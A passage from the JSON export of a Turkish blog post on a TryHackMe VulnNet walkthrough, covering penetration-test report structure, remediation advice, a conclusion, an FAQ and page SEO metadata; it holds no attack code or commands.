a\u00e7\u0131k\u00e7a sunar.<\/p>\n<p>Bir s\u0131zma testi raporu genellikle a\u015fa\u011f\u0131daki b\u00f6l\u00fcmleri i\u00e7erir:<\/p>\n<ul>\n<li><strong>Y\u00f6netici \u00d6zeti:<\/strong> Teknik olmayan y\u00f6neticilerin anlayabilece\u011fi dilde, testin genel kapsam\u0131n\u0131, en kritik bulgular\u0131 ve genel risk seviyesini \u00f6zetler.<\/li>\n<li><strong>Giri\u015f:<\/strong> Testin amac\u0131, kapsam\u0131, metodolojisi ve zaman \u00e7izelgesi gibi temel bilgileri sunar.<\/li>\n<li><strong>Bulgular:<\/strong> Tespit edilen t\u00fcm zafiyetleri detayl\u0131 bir \u015fekilde listeler. Her bir zafiyet i\u00e7in a\u015fa\u011f\u0131daki bilgiler sa\u011flanmal\u0131d\u0131r:\n<ul>\n<li>Zafiyetin ad\u0131 ve CVSS (Common Vulnerability Scoring System) puan\u0131 ile risk seviyesi.<\/li>\n<li>Zafiyetin a\u00e7\u0131klamas\u0131 ve potansiyel etkileri.<\/li>\n<li>Zafiyetin nas\u0131l tespit edildi\u011fi (kullan\u0131lan ara\u00e7lar, komutlar, ad\u0131mlar).<\/li>\n<li>Zafiyetin nas\u0131l istismar edildi\u011fi (kan\u0131t niteli\u011finde ekran g\u00f6r\u00fcnt\u00fcleri veya komut \u00e7\u0131kt\u0131lar\u0131).<\/li>\n<\/ul>\n<\/li>\n<li><strong>\u00d6neriler:<\/strong> Tespit edilen her bir zafiyet i\u00e7in somut ve uygulanabilir d\u00fczeltme \u00f6nerileri sunar. Bu \u00f6neriler, teknik detaylar\u0131 i\u00e7ermeli ve m\u00fcmk\u00fcnse referans kaynaklarla (\u00f6rne\u011fin, OWASP Top 10, NIST y\u00f6nergeleri) desteklenmelidir. \u00d6rne\u011fin, &#8220;g\u00fcvenli olmayan bir PHP fonksiyonu kullan\u0131ld\u0131&#8221; bulgusu i\u00e7in &#8220;bu fonksiyon yerine daha g\u00fcvenli olan <code>filter_var()<\/code> gibi bir fonksiyon kullan\u0131n&#8221; \u015feklinde bir \u00f6neri sunulabilir.<\/li>\n<li><strong>Sonu\u00e7:<\/strong> Testin genel de\u011ferlendirmesi ve gelecekteki g\u00fcvenlik stratejileri i\u00e7in tavsiyeler.<\/li>\n<\/ul>\n<p>T\u00fcrkiye&#8217;deki \u015firketler i\u00e7in de bu raporlama s\u00fcreci b\u00fcy\u00fck \u00f6nem ta\u015f\u0131r. \u00d6zellikle reg\u00fclasyonlara tabi sekt\u00f6rlerde (finans, telekom\u00fcnikasyon vb.) veya ki\u015fisel veri i\u015fleyen kurulu\u015flar i\u00e7in (KVKK uyumlulu\u011fu kapsam\u0131nda), s\u0131zma testi raporlar\u0131 denetim s\u00fcre\u00e7lerinde kritik bir belge niteli\u011fi ta\u015f\u0131r. \u0130yi haz\u0131rlanm\u0131\u015f bir rapor, sadece mevcut zafiyetleri g\u00f6stermekle kalmaz, ayn\u0131 zamanda organizasyonun siber g\u00fcvenlik olgunlu\u011funu art\u0131rmas\u0131 i\u00e7in bir yol haritas\u0131 sunar. Raporlama a\u015famas\u0131nda dikkat edilmesi gereken en \u00f6nemli noktalardan biri, bulgular\u0131n a\u00e7\u0131k, anla\u015f\u0131l\u0131r ve eyleme ge\u00e7irilebilir olmas\u0131d\u0131r. &#8220;Bu bir zafiyet&#8221; demek yeterli de\u011fildir; &#8220;bu zafiyet X \u015fekilde istismar edilebilir ve Y sonucunu do\u011furur, Z \u00f6nlemi al\u0131narak giderilebilir&#8221; \u015feklinde detayland\u0131rmak gerekir.<\/p>\n<p>G\u00fcvenli\u011fi art\u0131rma ad\u0131mlar\u0131, sadece teknik d\u00fczeltmelerle s\u0131n\u0131rl\u0131 de\u011fildir. Ayn\u0131 zamanda s\u00fcre\u00e7sel ve insan fakt\u00f6r\u00fcne y\u00f6nelik iyile\u015ftirmeleri de kapsar. \u00d6rne\u011fin, bir LFI zafiyetinin tespit edilmesi, sadece kodda d\u00fczeltme yap\u0131lmas\u0131n\u0131 de\u011fil, ayn\u0131 zamanda geli\u015ftiricilerin g\u00fcvenli kodlama pratikleri konusunda e\u011fitilmesini de gerektirebilir. Bir <code>sudo<\/code> miskonfig\u00fcrasyonu bulunmas\u0131 durumunda, sistem y\u00f6neticilerinin yetki y\u00f6netimi politikalar\u0131n\u0131 g\u00f6zden ge\u00e7irmeleri ve en az ayr\u0131cal\u0131k (least privilege) prensibini uygulamalar\u0131 \u00f6nemlidir. Periyodik g\u00fcvenlik denetimleri, zafiyet taramalar\u0131 ve \u00e7al\u0131\u015fanlara y\u00f6nelik siber g\u00fcvenlik fark\u0131ndal\u0131k e\u011fitimleri, s\u00fcrekli bir g\u00fcvenlik duru\u015fu sa\u011flamak i\u00e7in kritik \u00f6neme sahiptir. TryHackMe gibi platformlarda kazan\u0131lan pratik deneyimler, bu raporlama ve iyile\u015ftirme s\u00fcre\u00e7lerinde, bulunan zafiyetlerin ger\u00e7ek d\u00fcnya etkilerini daha iyi anlaman\u0131za ve daha etkili \u00f6neriler sunman\u0131za yard\u0131mc\u0131 olur. Unutmay\u0131n, bir s\u0131zma testi tek seferlik bir olay de\u011fil, s\u00fcrekli bir g\u00fcvenlik iyile\u015ftirme d\u00f6ng\u00fcs\u00fcn\u00fcn \u00f6nemli bir par\u00e7as\u0131d\u0131r.<\/p>\n<h2>Sonu\u00e7 ve \u0130leri Ad\u0131mlar: Siber G\u00fcvenlik Yolculu\u011funuz<\/h2>\n<p>Bu makalede, TryHackMe&#8217;deki VulnNet serisi makinelerinden yola \u00e7\u0131karak, bir s\u0131zma testi s\u00fcrecinin temel a\u015famalar\u0131n\u0131, ke\u015fiften yetki y\u00fckseltmeye kadar ad\u0131m ad\u0131m inceledik. Nmap ile port taramas\u0131, Gobuster ile dizin ke\u015ffi, web uygulamas\u0131 zafiyetlerinin (LFI, komut enjeksiyonu) istismar\u0131 ve Linux sistemlerinde SUID, sudo miskonfig\u00fcrasyonlar\u0131 gibi yetki y\u00fckseltme teknikleri \u00fczerinde durduk. G\u00f6rd\u00fc\u011f\u00fcm\u00fcz gibi, ba\u015far\u0131l\u0131 bir s\u0131zma testi sadece teknik beceri de\u011fil, ayn\u0131 zamanda sab\u0131r, analitik d\u00fc\u015f\u00fcnme ve problem \u00e7\u00f6zme yetene\u011fi de gerektirir. Her ad\u0131mda kar\u015f\u0131la\u015f\u0131lan engeller, yeni \u00f6\u011frenme f\u0131rsatlar\u0131 sunar ve siber g\u00fcvenlik yolculu\u011funuzda sizi daha donan\u0131ml\u0131 hale getirir.<\/p>\n<p>Siber g\u00fcvenlik alan\u0131 s\u00fcrekli geli\u015fen ve de\u011fi\u015fen bir aland\u0131r. Bug\u00fcn \u00f6\u011frendi\u011finiz bir teknik, yar\u0131n ge\u00e7erlili\u011fini yitirebilir veya yeni sald\u0131r\u0131 vekt\u00f6rleri ortaya \u00e7\u0131kabilir. Bu nedenle, s\u00fcrekli \u00f6\u011frenmeye ve kendinizi g\u00fcncel tutmaya devam etmek b\u00fcy\u00fck \u00f6nem ta\u015f\u0131r. TryHackMe, Hack The Box gibi platformlar, ger\u00e7ek\u00e7i senaryolarla pratik yapma imkan\u0131 sunarken, OWASP Top 10, PortSwigger Web Security Academy gibi kaynaklar teorik bilginizi peki\u015ftirmenize yard\u0131mc\u0131 olacakt\u0131r. Siber g\u00fcvenlik uzman\u0131 olmak, sadece ara\u00e7lar\u0131 kullanmak de\u011fil, ayn\u0131 zamanda sistemlerin nas\u0131l \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131, zafiyetlerin neden ortaya \u00e7\u0131kt\u0131\u011f\u0131n\u0131 ve bu zafiyetlerin nas\u0131l giderilece\u011fini derinlemesine anlamay\u0131 gerektirir. Bu yolculukta edindi\u011finiz her bilgi ve deneyim, dijital d\u00fcnyay\u0131 daha g\u00fcvenli bir yer haline getirme misyonunuza katk\u0131da bulunacakt\u0131r.<\/p>\n<h3>S\u0131k\u00e7a Sorulan Sorular<\/h3>\n<ul>\n<li><strong>TryHackMe&#8217;deki VulnNet serisi sadece Linux makineleri mi i\u00e7eriyor?<\/strong>\n<p>VulnNet serisi genellikle Linux tabanl\u0131 makinelerden olu\u015fur, ancak TryHackMe platformunda Windows makineleri i\u00e7eren ba\u015fka seriler ve odalar da bulunmaktad\u0131r. Bu sayede hem Linux hem de Windows sistemleri \u00fczerinde s\u0131zma testi becerilerinizi geli\u015ftirebilirsiniz.<\/p>\n<\/li>\n<li><strong>S\u0131zma testine yeni ba\u015flayanlar i\u00e7in hangi TryHackMe odalar\u0131n\u0131 \u00f6nerirsiniz?<\/strong>\n<p>Yeni ba\u015flayanlar i\u00e7in &#8220;Starter Pentest&#8221;, &#8220;Complete Beginner&#8221;, &#8220;OpenVPN&#8221; gibi giri\u015f seviyesi odalar\u0131 ve &#8220;Basic Pentesting&#8221;, &#8220;VulnNet: Sudo&#8221; gibi daha temel s\u0131zma testi senaryolar\u0131n\u0131 i\u00e7eren odalar \u00f6nerilir. Bu odalar, temel kavramlar\u0131 ve ara\u00e7lar\u0131 \u00f6\u011frenmek i\u00e7in harika bir ba\u015flang\u0131\u00e7 noktas\u0131d\u0131r.<\/p>\n<\/li>\n<li><strong>Bir s\u0131zma testinde yetki y\u00fckseltme neden bu kadar \u00f6nemlidir?<\/strong>\n<p>Yetki y\u00fckseltme, sisteme tam kontrol sa\u011flamak ve en hassas verilere (\u00f6rne\u011fin, \u015fifreler, \u00f6zel anahtarlar) eri\u015fmek i\u00e7in kritik \u00f6neme sahiptir. D\u00fc\u015f\u00fck yetkili bir kullan\u0131c\u0131 olarak elde edilen ilk eri\u015fim, genellikle sistem \u00fczerinde kal\u0131c\u0131 bir iz b\u0131rakmak veya daha fazla ke\u015fif yapmak i\u00e7in yeterli de\u011fildir. K\u00f6k yetkileri, sald\u0131rgan\u0131n sistemde istedi\u011fi de\u011fi\u015fikli\u011fi yapmas\u0131na, di\u011fer kullan\u0131c\u0131lar\u0131n verilerine eri\u015fmesine ve hatta sistemin tamamen kontrol\u00fcn\u00fc ele ge\u00e7irmesine olanak tan\u0131r.<\/p>\n<\/li>\n<li><strong>S\u0131zma testi raporunda hangi bilgiler olmazsa olmazd\u0131r?<\/strong>\n<p>S\u0131zma testi raporunda y\u00f6netici \u00f6zeti, testin kapsam\u0131 ve metodolojisi, tespit edilen her bir zafiyetin detayl\u0131 a\u00e7\u0131klamas\u0131 (risk seviyesi, etkisi, tespit ve istismar ad\u0131mlar\u0131) ve her zafiyet i\u00e7in somut d\u00fczeltme \u00f6nerileri olmazsa olmaz bilgilerdir. Kan\u0131t niteli\u011findeki ekran g\u00f6r\u00fcnt\u00fcleri ve komut \u00e7\u0131kt\u0131lar\u0131 da raporun g\u00fcvenilirli\u011fini art\u0131r\u0131r.<\/p>\n<\/li>\n<\/ul>\n<p>#SiberG\u00fcvenlik #PenetrasyonTesti #TryHackMe #VulnNet #EtikHacker<\/p>\n<div class=\"github-example-link\"><strong>\u00d6rnek kod:<\/strong> <a href=\"https:\/\/github.com\/fatihsoysalcom\/python-command-injection-vulnerability-demo\" target=\"_blank\" rel=\"noopener noreferrer\">github.com\/fatihsoysalcom\/python-command-injection-vulnerability-demo<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"Siber g\u00fcvenlik d\u00fcnyas\u0131nda kendinizi geli\u015ftirmek ve ger\u00e7ek d\u00fcnya senaryolar\u0131na haz\u0131rlanmak i\u00e7in interaktif platformlar b\u00fcy\u00fck \u00f6nem ta\u015f\u0131r.","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"csco_page_header_type":"","csco_page_load_nextpost":"","csco_page_subscribe_form":"","csco_page_contact_form":"","footnotes":""},"categories":[1],"tags":[],"class_list":{"0":"post-42510","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-genel","7":"cs-entry","8":"cs-video-wrap"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v20.5 (Yoast SEO v25.3.1) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi\" \/>\n<meta property=\"og:description\" content=\"Siber g\u00fcvenlik d\u00fcnyas\u0131nda kendinizi geli\u015ftirmek ve ger\u00e7ek d\u00fcnya senaryolar\u0131na haz\u0131rlanmak i\u00e7in interaktif platformlar b\u00fcy\u00fck \u00f6nem ta\u015f\u0131r.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\" \/>\n<meta property=\"og:site_name\" content=\"Kodlar\u0131n Gizemli D\u00fcnyas\u0131\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-13T06:11:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-06-13T06:12:02+00:00\" \/>\n<meta name=\"author\" content=\"Fatih Soysal\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Yazan:\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fatih Soysal\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 dakika\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\"},\"author\":{\"name\":\"Fatih Soysal\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\"},\"headline\":\"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi\",\"datePublished\":\"2026-06-13T06:11:38+00:00\",\"dateModified\":\"2026-06-13T06:12:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\"},\"wordCount\":3866,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#respond\"]}],\"copyrightYear\":\"2026\",\"copyrightHolder\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#organization\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\",\"name\":\"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131\",\"isPartOf\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#website\"},\"datePublished\":\"2026-06-13T06:11:38+00:00\",\"dateModified\":\"2026-06-13T06:12:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Anasayfa\",\"item\":\"https:\/\/fatihsoysal.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#website\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/\",\"name\":\"Fatihsoysal.com\",\"description\":\"Blog - Yaz\u0131l\u0131m D\u00fcnyas\u0131 Tecr\u00fcbelerim\",\"publisher\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/fatihsoysal.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1\",\"name\":\"Fatih Soysal\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png\",\"contentUrl\":\"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png\",\"width\":512,\"height\":512,\"caption\":\"Fatih Soysal\"},\"logo\":{\"@id\":\"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/\"},\"description\":\"Kullan\u0131m ve kodlama m\u00fckemmeliyetini odak alan uygulamalar olu\u015fturma deneyimine sahip, profesyonel olarak 15+ y\u0131l \u00fczeri deneyime sahip bir yaz\u0131l\u0131m m\u00fchendisi.\",\"url\":\"https:\/\/fatihsoysal.com\/blog\/author\/fatihsoysal\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/","og_locale":"tr_TR","og_type":"article","og_title":"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi","og_description":"Siber g\u00fcvenlik d\u00fcnyas\u0131nda kendinizi geli\u015ftirmek ve ger\u00e7ek d\u00fcnya senaryolar\u0131na haz\u0131rlanmak i\u00e7in interaktif platformlar b\u00fcy\u00fck \u00f6nem ta\u015f\u0131r.","og_url":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/","og_site_name":"Kodlar\u0131n Gizemli D\u00fcnyas\u0131","article_published_time":"2026-06-13T06:11:38+00:00","article_modified_time":"2026-06-13T06:12:02+00:00","author":"Fatih Soysal","twitter_card":"summary_large_image","twitter_misc":{"Yazan:":"Fatih Soysal","Tahmini okuma s\u00fcresi":"20 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#article","isPartOf":{"@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/"},"author":{"name":"Fatih Soysal","@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1"},"headline":"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi","datePublished":"2026-06-13T06:11:38+00:00","dateModified":"2026-06-13T06:12:02+00:00","mainEntityOfPage":{"@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/"},"wordCount":3866,"commentCount":0,"publisher":{"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1"},"inLanguage":"tr","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#respond"]}],"copyrightYear":"2026","copyrightHolder":{"@id":"https:\/\/fatihsoysal.com\/blog\/#organization"}},{"@type":"WebPage","@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/","url":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/","name":"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131","isPartOf":{"@id":"https:\/\/fatihsoysal.com\/blog\/#website"},"datePublished":"2026-06-13T06:11:38+00:00","dateModified":"2026-06-13T06:12:02+00:00","breadcrumb":{"@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Anasayfa","item":"https:\/\/fatihsoysal.com\/blog\/"},{"@type":"ListItem","position":2,"name":"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi"}]},{"@type":"WebSite","@id":"https:\/\/fatihsoysal.com\/blog\/#website","url":"https:\/\/fatihsoysal.com\/blog\/","name":"Fatihsoysal.com","description":"Blog - Yaz\u0131l\u0131m D\u00fcnyas\u0131 Tecr\u00fcbelerim","publisher":{"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/fatihsoysal.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":["Person","Organization"],"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/002a254750921dcfd568a99e48240dd1","name":"Fatih Soysal","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png","contentUrl":"https:\/\/fatihsoysal.com\/blog\/wp-content\/uploads\/2024\/04\/cropped-replicate-prediction-3kgg1hgjn5rgp0cf0p5tr0jw7w-1.png","width":512,"height":512,"caption":"Fatih Soysal"},"logo":{"@id":"https:\/\/fatihsoysal.com\/blog\/#\/schema\/person\/image\/"},"description":"Kullan\u0131m ve kodlama m\u00fckemmeliyetini odak alan uygulamalar olu\u015fturma deneyimine sahip, profesyonel olarak 15+ y\u0131l \u00fczeri deneyime sahip bir yaz\u0131l\u0131m m\u00fchendisi.","url":"https:\/\/fatihsoysal.com\/blog\/author\/fatihsoysal\/"}]}},"yoast_meta":{"yoast_wpseo_title":"","yoast_wpseo_metadesc":"","yoast_wpseo_canonical":""},"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts\/42510","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/comments?post=42510"}],"version-history":[{"count":1,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts\/42510\/revisions"}],"predecessor-version":[{"id":42511,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/posts\/42510\/revisions\/42511"}],"wp:attachment":[{"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/media?parent=42510"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/categories?post=42510"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fatihsoysal.com\/blog\/wp-json\/wp\/v2\/tags?post=42510"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}